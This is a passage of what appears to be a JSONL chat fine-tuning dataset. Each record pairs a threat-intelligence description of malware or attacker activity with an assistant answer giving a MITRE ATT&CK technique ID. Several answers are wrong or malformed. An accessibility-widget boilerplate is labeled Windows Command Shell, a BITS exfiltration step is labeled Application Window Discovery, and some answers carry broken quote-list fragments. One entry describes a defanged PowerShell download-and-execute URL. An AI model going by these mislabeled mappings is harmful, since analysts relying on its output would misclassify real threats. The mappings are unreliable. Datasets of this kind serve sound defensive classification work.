\"Cookie\" field of HTTP requests. For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values and sends the data in cleartext." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has stopped SQL services to ensure it can encrypt any database." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used domain accounts to gain further access to victim systems." }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by FireEye in September 2017.  The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT can list running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "lists the running processes" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For that we can use a Python script, included in Appendix B – Python Scripts" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to decode this data, Comnie first decodes it using base64 with the following non-standard alphabet (note that it is simply the original alphabet in reverse): /+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA   The resulting data is then parsed and decrypted using RC4" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the IP address and domain from the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use the command-line utility cacls.exe to change file permissions." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1222 - File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While historically TA416 has delivered Zip files from cloud hosting providers containing a decoy file, legitimate PE file, a DLL loader, and a PlugX malware configuration DAT file, recent campaigns used a different tactic. Proofpoint researchers noted that the malicious Zip files delivered from DropBox now contain a rudimentary executable which is a dropper malware. This malware establishes persistence for a legitimate executable file used in DLL search order hijacking, as well as initiates the download of four components. These components are included below and resemble the components used in the past to install PlugX malware. Public research has previously documented TA416’s propensity for including PlugX Trident Loader components and decoy in the initial delivered Zip file. The method of installing PlugX via DLL Search Order hijacking that displays a PDF decoy remains constant" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used RC4 to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can discover and collect victim system information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed." }, { "role": "assistant", "content": "T1132.002 - Non-Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RedLeaves can obtain information about the logged on user both locally and for Remote Desktop sessions." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "How about DPAPI with keys tied per user & system. Volume serial ID keying. See the APT41 talk #FireEyeSummit7:19 PM · Oct 30, 2019·Twitter for Android12 Retweets1 Quote Tweet35 LikesNick Carr@ItsReallyNick" }, { "role": "assistant", "content": "T1480.001 - Environmental Keying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB" }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method', 'T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This group uses spear-phishing emails to deliver both malicious Word and PDF documents, and attempts to social engineer the victim into an infection rather than trying to exploit a software vulnerability" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa has the capability to create and modify file timestamps." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer can use supplied user credentials to execute processes and stop services." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "deleted the DLL dropper from the victim’s machine to cover their tracks." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "COM and execution in same sentence" }, { "role": "assistant", "content": "T1021.003 - Remote Services: Distributed Component Object Model" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Briba installs a service pointing to a malicious DLL dropped to disk." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Javascript backdoor added a local_update_check value under the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish persistence. Additionally, a custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can measure the download speed on a targeted host." }, { "role": "assistant", "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point" }, { "role": "assistant", "content": "T1609 - Kubernetes Exec Into Container" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to overwrite operating system files with image files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackEnergy has conducted port scans on a host." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. MSGet typically downloads encoded binaries from hard-coded URLs. Source: Secureworks) - Screen Capture Tool— This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR — This tool extracts tools for lateral movement and compresses data for exfiltration. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity" }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can use \"netstat\" to enumerate current network connections." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been observed being used to download and the Cobalt Strike Beacon payload onto victims." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilGrab has the capability to capture audio from a victim machine." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUPERNOVA is a Web shell." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Threat Group-3390 tool can create a new service, naming it after the config information, to gain persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLUELIGHT can zip files before exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script writes files to the path % appdata %\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily." }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can identify the process that owns remote connections." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro finishes by running the dropped VBScript \"AppPool.vbs\" file by running \"wscript C:\\ProgramData\\WindowsAppPool\\AppPool.vbs\". When first executed, the \"AppPool.vbs\" file will create the following scheduled task to execute every minute, which provides BONDUPDATER persistence and the ability to continually run on the system as the Trojan does not have a main loop to carry out its functionality" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackConfig has the ability to gather the victim's computer name." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SEASHARPEE can timestomp files on victims using a Web shell." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used RDP to move laterally in victim networks." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MCMD has been named Readme.txt to appear legitimate." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volexity has identified multiple new attack campaigns being launched by OceanLotus via multiple fake websites and Facebook pages that have been set up within the last year. In addition to targeting those within Vietnam, Volexity has seen renewed targeting of OceanLotus's neighbors throughout Southeast Asia. These websites have been observed profiling users, redirecting to phishing pages, and being leveraged to distribute malware payloads for Windows and OSX. This post will focus on one of the larger campaigns where OceanLotus has leveraged multiple fake news websites to target users" }, { "role": "assistant", "content": "T1585.001 - Social Media Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OFF ON Vision Impaired Profile Enhances website's visuals This profile adjusts the website, so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. This website utilizes various technologies that are meant to make it as accessible as possible at all times. We utilize an accessibility interface that allows persons with specific disabilities to adjust the website’s UI (user interface) and design it to their personal needs. This application remediates the website’s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments. In this process, we provide screen-readers with meaningful data using the ARIA set of attributes. It will also extract texts embedded within the image using an OCR (optical character recognition) technology. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Additional UI, design, and readability adjustments . 1) Font adjustments – users can increase and decrease its size, change its family (type), adjust the spacing, alignment, line height, and more. 7) Additional functions – we allow users to change cursor color and size, use a printing mode, enable a virtual keyboard, and many other functions. Still, we are continually improving our accessibility, adding, updating, improving its options and features, and developing and adopting new technologies" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "identifies the victim username." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has developed custom malware such as Hildegard." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stop the service COMSysApp - Configure the service to autostart (to set up persistence on the system) - Modify registry keys to launch the DLL unser svchost.exe - Specify the malicious DLL path to be loaded into the svchost process. Immediately restart the service - Remove the batch files to reduce the fingerprint on the system" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution', 'T1055 - Process Injection', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1070.004 - Indicator Removal on Host: File Deletion', 'T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses 's malleable C2 functionality to blend in with network traffic." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2" }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Deletes some of its files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe, ssh.exe" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel has decrypted strings and imports using RC4 during execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT has the ability to use the Gmail web UI to receive commands and exfiltrate information." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another indicator of a Qakbot infection is HTTPS traffic to cdn.speedof[.]me. The domain speedof[.]me is used by a legitimate Internet speed test service. Although this is not malicious traffic, we frequently see traffic to cdn.speedof[.]me during Qakbot infections. Figure 20 shows this activity from our pcap." }, { "role": "assistant", "content": "T1090.004 - Domain Fronting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Babuk has the ability to use the command line to control execution on compromised hosts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY's `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RGDoor establishes persistence on webservers as an IIS module." }, { "role": "assistant", "content": "T1505.004 - IIS Components" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike's \"beacon\" payload can collect information on process details." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has exfiltrated stolen data to OneDrive accounts." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Waterbear can scramble functions not to be executed again with random values." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SQLRat has used been observed deleting scripts once used." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay has created Registry Run keys to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is a rootkit that hides certain operating system artifacts." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of writing to a Registry Run key to establish." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has renamed system utilities such as \"wscript.exe\" and \"mshta.exe\"." }, { "role": "assistant", "content": "T1036.003 - Masquerading: Rename System Utilities" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT encrypts collected data with AES and Base64 and then sends it to the C2 server." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TG-3390 has used additional web shells containing similarly formatted passwords" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike's \"beacon\" payload is capable of running shell commands without \"cmd.exe\" and PowerShell commands without \"powershell.exe\"" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used network scanning and enumeration tools, including ." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system." }, { "role": "assistant", "content": "T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses commands such as netsh advfirewall firewall to discover local firewall settings." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ProxyShell elevation of privilege on the Exchange PowerShell Backend (CVE-2021-34523), Windows Background Intelligent Transfer Service (BITS) improperly handling symbolic links (CVE-2020-0787), and abusing the CMSTPLUA COM interface have all been seen as methods of privilege escalation." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EKANS can use Windows Mangement Instrumentation (WMI) calls to execute operations." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d)  contains the following formula that Excel will save to the “A0” cell in the worksheet: The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A payload was packed with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike uses a command-line interface to interact with systems." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { 